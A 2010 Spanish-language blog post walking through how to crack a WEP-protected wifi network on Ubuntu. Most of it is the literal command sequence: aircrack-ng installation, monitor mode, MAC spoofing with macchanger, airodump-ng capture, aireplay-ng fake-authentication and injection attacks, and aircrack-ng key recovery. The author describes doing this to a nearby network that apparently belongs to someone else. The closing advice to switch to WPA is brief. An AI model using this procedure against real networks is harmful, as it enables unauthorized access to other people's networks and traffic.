15 septiembre 2010

Como crackear una red wifi cifrada con WEP en Ubuntu

La verdad, es que Juanito hace tiempo que me picó con el tema del crackeo de redes inalámbricas. Tampoco le presté mucha más atención que la un simple pique absurdo. Sin embargo el otro día pensé, a ver si es muy difícil esto, y la verdad es que con Ubuntu no puede ser más sencillo.

Evidentemente, yo no lo utilizo para tener red gratis, más que nada por que yo tengo mi red de banda ancha conectada con mi RJ45.

Ahora la conclusión es inmediata, proteger una red inalámbrica con cifrado WEP es como dejar un caramelo en la puerta de un colegio.

Tengo que decir que he tardado menos de 5 minutos (y creo que exagero con el tiempo) en conseguir descifrar la contraseña de una red próxima, y no tengo que exagerar. Así que recomiendo a todos aquellos incautos que tengan la red protegida con WEP que se olviden y se pasen inmediatamente a WPA, o mejor que bloqueen las MAC que pueden acceder a su red.

Los pasos que seguí para hacer esta operación, fueron los siguientes:

1.- Instalé la suite aircrack-ng

1sudo apt-get install aircrack-ng

2.- Instalé Macchanger

1sudo apt-get install macchanger

3.- A partir de aquí me desconecté de la red wifi y ejecuté:

1sudo airmon-ng start wlan0

aquí se puede ver que mon0 está activo

Thumbnail image

4.- Dí de baja mon0

1sudo ifconfig mon0 down

5.- Operación enmascarado. Cambié la MAC de nuestra tarjeta de red, por una más molona:

1sudo macchanger -m 00:11:22:33:44:55 mon0

6- Dí nuevamente de alta mon0, pero con su nueva dirección MAC:

1sudo ifconfig mon0 up

7.- Escaneé las redes que había por la zona

1sudo airodump-ng mon0

Thumbnail image

8.- Cuando encontré una que me gustaba, detuve la búsqueda con Ctrl-C. Para poder descifrar la contraseña, es necesario que la columna “#Data” de la red en cuestión sea distinto de cero, sino es que no hay transmisión de paquetes y no se puede hacer nada.

A partir de este momento, es cuando mi monitor se parece al de Matrix, todo lleno de ventanas negras con letras verdes. Pues a partir de ahora cada instrucción se corre en una nueva ventana.

9.- Abrí otro terminal y ejecuté airodump-ng, con los siguientes parámetros (sustituyendo los datos entre corchetes con los de la red en cuestión):

1sudo airodump-ng -c [CH] -w [ESSID] --bssid [BSSID] mon0

donde, todos los datos se sacan del punto 7:

CH es el canal

ESSID es el nombre de la red

BSSID es la dirección MAC

Thumbnail image

10.- Otro terminal, para ejecutar el ataque a la red:

1sudo aireplay-ng -1 6000 -a [BSSID] -h 00:11:22:33:44:55 mon0

donde:

BSSID es la dirección MAC

Thumbnail image

11.- Más terminales!!!!:

1sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h 00:11:22:33:44:55 mon0

donde:

BSSID es la dirección MAC

Thumbnail image

12.- Ahora la última terminal, donde se obtiene la clave descifrada:

1sudo aircrack-ng -z [ESSID]*.cap

donde:

ESSID es el nombre de la red

Una vez ejecuté el último punto se obtiene la clave en formato XX:XX:XX:XX:XX:XX. Ya está terminado, me costó unos segundos. Ya hemos crackeado la red.

Thumbnail image

Thumbnail image

La pantalla de Matrix:

Thumbnail image

Visto lo visto, no se te ocurra utilizar encriptación WEP para tu red, ya has visto lo fácil que es.

Publicar un comentario